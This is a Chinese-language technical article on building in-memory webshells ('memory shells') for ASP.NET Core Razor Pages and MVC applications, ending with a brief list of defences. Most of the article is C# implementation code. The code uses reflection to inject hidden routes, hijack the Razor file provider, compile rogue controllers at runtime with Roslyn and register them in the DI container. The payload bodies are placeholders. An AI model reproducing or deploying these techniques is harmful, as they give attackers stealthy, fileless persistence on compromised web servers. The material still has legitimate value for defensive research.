.NET Core 内存马技术分析与实现<\/h1>

1. 背景与前提<\/h2>

1.1 .NET Core Web开发模式<\/h3>

ASP.NET Core 支持三种主要开发模式：<\/p>

Razor Pages<\/strong>：建立在MVC基础上的简化形式，URL路径由文件系统位置决定<\/li>
MVC<\/strong>：传统的模型-视图-控制器模式<\/li>

Blazor<\/strong>：组件化、现代应用框架，支持WebAssembly或Server模式<\/li> <\/ul>
1.2 运行时编译机制<\/h3>
在未开启运行时编译时，除静态文件外所有内容都会预编译为dll。开启运行时编译后：<\/p>

允许修改.cshtml文件实现动态更新<\/li>
Razor Pages中.cshtml作为单页页面<\/li>
MVC中.cshtml作为视图文件<\/li> <\/ul>
相关配置项：<\/p>
<RazorCompileOnBuild><\/span>false<\/RazorCompileOnBuild><\/span> <\/span> <\/span><\/span><RazorCompileOnPublish><\/span>false<\/RazorCompileOnPublish><\/span> <\/span> <\/span><\/span><CopyRazorGenerateFilesToPublishDirectory><\/span>true<\/CopyRazorGenerateFilesToPublishDirectory><\/span> <\/span> <\/span><\/span><\/code><\/pre>1.3 ASP.NET Core核心机制<\/h3> 依赖注入(DI)<\/strong>：所有服务通过DI提供，每个请求创建新的IServiceProvider<\/li> 中间件管道<\/strong>：由一系列中间件组成，MVC框架建立在EndpointRoutingMiddleware和EndpointMiddleware上<\/li> 路由系统<\/strong>：维护Endpoint集合，包含路由模式与RequestDelegate委托的映射<\/li> <\/ul> 2. Razor Pages内存马实现<\/h2> 2.1 Razor Pages架构分析<\/h3> 项目结构<\/h4> Pages\/ # Razor页面 wwwroot\/ # 静态文件 appsettings.json # 配置 Program.cs # 启动配置 <\/code><\/pre> 启动流程关键点<\/h4> AddRazorPages()<\/code>：注册页面服务<\/li> MapRazorPages()<\/code>：创建Endpoint<\/li> PageActionEndpointDataSource<\/code>：监听变动并更新路由<\/li> <\/ol> 请求处理流程<\/h4> EndpointRoutingMiddleware<\/code>匹配Endpoint<\/li> EndpointMiddleware<\/code>执行Endpoint的RequestDelegate<\/li> <\/ol> 2.2 内存马实现技术<\/h3> 核心思路<\/h4> 通过实现IPageRouteModelProvider<\/code>接口添加恶意路由<\/p> public<\/span> class<\/span> ShellPageRouteModelProvider<\/span> : IPageRouteModelProvider <\/span><\/span>{ <\/span><\/span> public<\/span> int<\/span> Order { get<\/span> => -1000<\/span> + 10<\/span>; } <\/span><\/span> public<\/span> string<\/span> _pagePath; <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> OnProvidersExecuting(PageRouteModelProviderContext context) <\/span><\/span> { <\/span><\/span> var<\/span> pagePath = _pagePath; <\/span><\/span> var<\/span> relativePath = "\/Shell_"<\/span>; <\/span><\/span> var<\/span> routeModel = new<\/span> PageRouteModel(relativePath, pagePath); <\/span><\/span> routeModel.RouteValues.Add("page"<\/span>, routeModel.ViewEnginePath); <\/span><\/span> routeModel.Selectors.Add(new<\/span> SelectorModel <\/span><\/span> { <\/span><\/span> AttributeRouteModel = new<\/span> AttributeRouteModel <\/span><\/span> { <\/span><\/span> Template = AttributeRouteModel.CombineTemplates(pagePath, null<\/span>), <\/span><\/span> }, <\/span><\/span> EndpointMetadata = { new<\/span> PageRouteMetadata(pagePath, null<\/span>) } <\/span><\/span> }); <\/span><\/span> context.RouteModels.Add(routeModel); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>文件系统劫持<\/h4> 实现自定义IFileProvider<\/code>绕过物理文件检查：<\/p> public<\/span> class<\/span> MyFileInfo<\/span> : IFileInfo <\/span><\/span>{ <\/span><\/span> public<\/span> bool<\/span> Exists => true<\/span>; <\/span><\/span> \/\/ 其他属性实现...<\/span> <\/span><\/span> <\/span><\/span> public<\/span> Stream CreateReadStream() <\/span><\/span> { <\/span><\/span> \/\/ 还原原始FileSystem<\/span> <\/span><\/span> var<\/span> originalFileSystem = GetOriginalFileSystem(); <\/span><\/span> return<\/span> new<\/span> MemoryStream(Encoding.ASCII.GetBytes("恶意内容"<\/span>)); <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> TestFileFileProvider<\/span> : IFileProvider <\/span><\/span>{ <\/span><\/span> public<\/span> IFileInfo GetFileInfo(string<\/span> subpath) <\/span><\/span> { <\/span><\/span> if<\/span> (subpath.Contains("Shell_"<\/span>)) <\/span><\/span> { <\/span><\/span> return<\/span> new<\/span> MyFileInfo { Name = subpath }; <\/span><\/span> } <\/span><\/span> return<\/span> GetOriginalFileSystem().GetFileInfo(subpath); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>2.3 注入流程<\/h3> 添加自定义PageRouteModelProvider：<\/li> <\/ol> var<\/span> pagePath = "\/fakepath\/"<\/span> + Guid.NewGuid().ToString("D"<\/span>); <\/span><\/span>var<\/span> pageActionDescriptorProvider = GetPageActionDescriptorProvider(); <\/span><\/span>var<\/span> routeModelProvidersField = pageActionDescriptorProvider.GetType().GetField( <\/span><\/span> "_routeModelProviders"<\/span>, BindingFlags.Instance | BindingFlags.NonPublic); <\/span><\/span>var<\/span> routeModelProviders = (IPageRouteModelProvider[])routeModelProvidersField.GetValue(pageActionDescriptorProvider); <\/span><\/span>var<\/span> _list = routeModelProviders.ToList(); <\/span><\/span>_list.Add(new<\/span> ShellPageRouteModelProvider(pagePath)); <\/span><\/span>routeModelProvidersField.SetValue(pageActionDescriptorProvider, _list.ToArray()); <\/span><\/span><\/code><\/pre> 替换Razor视图引擎的FileSystem：<\/li> <\/ol> var<\/span> myFileFileProvider = new<\/span> TestFileFileProvider(); <\/span><\/span>var<\/span> razorProjectEngine = GetRazorProjectEngine(); <\/span><\/span>var<\/span> fileSystem = razorProjectEngine.FileSystem; <\/span><\/span>\/\/ 反射修改_fileProvider和_compositeFileProvider<\/span> <\/span><\/span><\/code><\/pre> 通知路由更新：<\/li> <\/ol> var<\/span> originalFileSystem = GetOriginalFileSystem(); <\/span><\/span>RestoreOriginalFileSystem(); <\/span><\/span>var<\/span> provider = GetActionDescriptorCollectionProvider(); <\/span><\/span>provider.GetType().GetMethod("UpdateCollection"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance) <\/span><\/span> .Invoke(provider, null<\/span>); <\/span><\/span><\/code><\/pre>3. MVC内存马实现<\/h2> 3.1 MVC架构分析<\/h3> 控制器实例化方式<\/h4> 默认实例化<\/strong>：<\/p> 使用DefaultControllerActivator<\/code><\/li> 每次请求创建新实例<\/li> 只解析控制器的依赖项<\/li> <\/ul> <\/li> DI容器实例化<\/strong>：<\/p> 使用ServiceBasedControllerActivator<\/code><\/li> 控制器本身也由DI容器管理<\/li> <\/ul> <\/li> <\/ol> 请求处理流程<\/h4> 匹配Endpoint<\/li> 创建ControllerActionInvoker<\/code><\/li> 实例化Controller并执行Action<\/li> <\/ol> 3.2 内存马实现技术<\/h3> 动态编译控制器<\/h4> 使用Roslyn动态编译恶意控制器：<\/p> public<\/span> Assembly Compile(string<\/span> text) <\/span><\/span>{ <\/span><\/span> var<\/span> references = AppDomain.CurrentDomain.GetAssemblies() <\/span><\/span> .Where(a => !a.IsDynamic && !string<\/span>.IsNullOrEmpty(a.Location)) <\/span><\/span> .Select(a => MetadataReference.CreateFromFile(a.Location)) <\/span><\/span> .Cast<MetadataReference>() <\/span><\/span> .ToList(); <\/span><\/span> <\/span><\/span> var<\/span> options = new<\/span> CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary); <\/span><\/span> var<\/span> assemblyName = "_"<\/span> + Guid.NewGuid().ToString("D"<\/span>); <\/span><\/span> var<\/span> syntaxTrees = new<\/span> SyntaxTree[] { CSharpSyntaxTree.ParseText(text) }; <\/span><\/span> var<\/span> compilation = CSharpCompilation.Create(assemblyName, syntaxTrees, references, options); <\/span><\/span> <\/span><\/span> using<\/span> var stream = new<\/span> MemoryStream(); <\/span><\/span> var<\/span> compilationResult = compilation.Emit(stream); <\/span><\/span> if<\/span> (compilationResult.Success) <\/span><\/span> { <\/span><\/span> stream.Seek(0<\/span>, SeekOrigin.Begin); <\/span><\/span> return<\/span> Assembly.Load(stream.ToArray()); <\/span><\/span> } <\/span><\/span> throw<\/span> new<\/span> InvalidOperationException("Compilation error"<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 使用示例<\/span> <\/span><\/span>string<\/span> action_name = "_"<\/span> + Guid.NewGuid().ToString("D"<\/span>).Replace("-"<\/span>, ""<\/span>); <\/span><\/span>string<\/span> controller_name = "_"<\/span> + Guid.NewGuid().ToString("D"<\/span>).Replace("-"<\/span>, ""<\/span>); <\/span><\/span>string<\/span> sourceCode = @" <\/span><\/span><\/span> public class {0}Controller <\/span><\/span><\/span> { <\/span><\/span><\/span> public string {1}() <\/span><\/span><\/span> { <\/span><\/span><\/span> return ""ok""; <\/span><\/span><\/span> } <\/span><\/span><\/span> } <\/span><\/span><\/span>"<\/span>.Replace("{1}"<\/span>, action_name).Replace("{0}"<\/span>, controller_name); <\/span><\/span> <\/span><\/span>var<\/span> assemblyShell = Compile(sourceCode); <\/span><\/span><\/code><\/pre>3.3 注入流程<\/h3> 默认实例化方式<\/h4> 添加程序集到ApplicationParts：<\/li> <\/ol> var<\/span> actionDescriptorProvider = GetControllerActionDescriptorProvider(); <\/span><\/span>var<\/span> partManager = actionDescriptorProvider.GetType().GetField( <\/span><\/span> "_partManager"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance).GetValue(actionDescriptorProvider); <\/span><\/span>var<\/span> applicationParts = (List<ApplicationPart>)partManager.GetType() <\/span><\/span> .GetProperty("ApplicationParts"<\/span>).GetValue(partManager); <\/span><\/span>var<\/span> assemblyPart = Activator.CreateInstance( <\/span><\/span> typeof<\/span>(AssemblyPart), assemblyShell); <\/span><\/span>applicationParts.Add(assemblyPart); <\/span><\/span><\/code><\/pre> 通知路由更新：<\/li> <\/ol> GetActionDescriptorCollectionProvider() <\/span><\/span> .GetType().GetMethod("UpdateCollection"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance) <\/span><\/span> .Invoke(GetActionDescriptorCollectionProvider(), null<\/span>); <\/span><\/span><\/code><\/pre>DI容器实例化方式<\/h4> 额外需要注册控制器服务：<\/p> var<\/span> requestServices = HttpContext.RequestServices; <\/span><\/span>Type controllerType = assemblyShell.DefinedTypes.FirstOrDefault( <\/span><\/span> t => t.FullName.Contains("Controller"<\/span>)); <\/span><\/span> <\/span><\/span>\/\/ 获取ServiceIdentifier相关反射对象<\/span> <\/span><\/span>var<\/span> serviceIdentifierType = GetServiceIdentifierType(); <\/span><\/span>var<\/span> fromServiceTypeMethod = serviceIdentifierType.GetMethod("FromServiceType"<\/span>); <\/span><\/span>var<\/span> rootProvider = GetRootProvider(); <\/span><\/span>var<\/span> serviceAccessors = GetServiceAccessors(rootProvider); <\/span><\/span> <\/span><\/span>\/\/ 创建自定义ServiceAccessor<\/span> <\/span><\/span>var<\/span> _controllerServiceIdentifier = fromServiceTypeMethod.Invoke( <\/span><\/span> null<\/span>, new<\/span> object<\/span>[] { controllerType }); <\/span><\/span>var<\/span> serviceAccessorType = GetServiceAccessorType(); <\/span><\/span>Func<object?<\/span>, object?<\/span>> func = _ => Activator.CreateInstance(controllerType); <\/span><\/span>var<\/span> serviceAccessor = Activator.CreateInstance(serviceAccessorType); <\/span><\/span>serviceAccessorType.GetProperty("RealizedService"<\/span>).SetValue(serviceAccessor, func); <\/span><\/span> <\/span><\/span>\/\/ 添加到ServiceAccessors<\/span> <\/span><\/span>var<\/span> tryAddMethod = serviceAccessors.GetType().GetMethod("TryAdd"<\/span>); <\/span><\/span>tryAddMethod.Invoke(serviceAccessors, new<\/span> object<\/span>[]{_controllerServiceIdentifier, serviceAccessor}); <\/span><\/span><\/code><\/pre>4. 防御建议<\/h2> 禁用运行时编译<\/strong>：生产环境应关闭Razor运行时编译<\/li> 文件上传限制<\/strong>：严格控制上传文件类型和内容<\/li> 依赖注入监控<\/strong>：监控异常的DI容器注册行为<\/li> 程序集加载控制<\/strong>：限制动态程序集加载<\/li> 路由变更检测<\/strong>：监控异常的路由表变更<\/li> 文件系统完整性检查<\/strong>：定期检查关键文件是否被篡改<\/li> <\/ol> 5. 总结<\/h2> .NET Core内存马技术主要利用：<\/p> Razor运行时编译机制<\/li> MVC路由系统的动态扩展性<\/li> 依赖注入容器的可扩展性<\/li> 反射机制绕过访问限制<\/li> <\/ol> 防御关键在于严格控制运行时动态修改能力，加强应用行为监控。<\/p>